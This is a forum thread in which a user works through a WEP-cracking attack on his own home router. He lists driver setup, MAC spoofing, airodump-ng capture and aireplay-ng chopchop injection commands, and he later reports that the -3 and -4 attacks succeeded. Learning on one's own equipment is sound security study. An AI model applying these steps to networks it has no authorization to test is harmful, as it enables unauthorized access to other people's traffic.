
Thread: ChopChop WEP attack with IPW2200

  1. #1
    Just burned his ISO
    Join Date
    Dec 2007

    ChopChop WEP attack with IPW2200

    Hi all, hoping you guys can point me in the right direction. I have been successful searching the forums, but I realized that I often know what to type but not WHY I'm typing it. I have just recently begun to explore the recommended Slax guides also.

    I am "attacking" from a Dell laptop with an Intel 2200BG (yuck, I know). I managed to successfully dual boot BT2 with XP Pro.

    The target is my Linksys WRT54G v2 running dd-wrt firmware (128-bit key WEP). My wife's desktop is connected to the Linksys to serve as the client.

    Here's my process so far (using aircrack 0.9.1 if it matters):

    rmmod ipw2200
    modprobe ipw2200 rtap_iface=1
    ifconfig eth1 up
    ifconfig rtap0 up
    #I think this creates rtap0 that I need to inject and listen. I also have no internet access until I do this. Why?

    ifconfig eth1 up hw ether 00:11:22:33:44:55
    #changes my MAC? Not really necessary (I don't yet MAC filter).

    iwconfig eth1 essid <AP essid> channel <AP channel> key s:fakekey mode managed
    #what does this accomplish?

    airodump-ng --bssid <AP MAC> -w <dump file> rtap0
    #begins listening with rtap0? The packet count begins climbing, but the data (IVs) stay very low (but I think this is normal with little/no traffic)

    aireplay-ng -4 -a <AP MAC> -h <My "fake" MAC> -i rtap0 eth1
    #begins reading packets (into the thousands).

    This is where I get stuck. Isn't it supposed to eventually stop reading packets and ask if I want to "use this packet" (y or n)? I got it to do this once and continued on with packetforge -0 and aireplay -2 (IVs went soaring)!!!

    Any insight as to what I am doing wrong?


  2. #2
    Developer balding_parrot
    Join Date
    May 2007


    If you read all these pages you will find that all of the commands are explained to an extent, and you should be able to see why the commands are strung together the way they are.

  3. #3
    Just burned his ISO
    Join Date
    Dec 2007


    Thanks for the direction. I managed to successfully and repeatedly crack my WEP with both -3 and -4 attacks this evening. A lot of my confusion stemmed from the 2200BG. I straightened out which interface should be listening, which should be sending, proper modes, etc., and it began working.

    Time to keep reading. Thanks
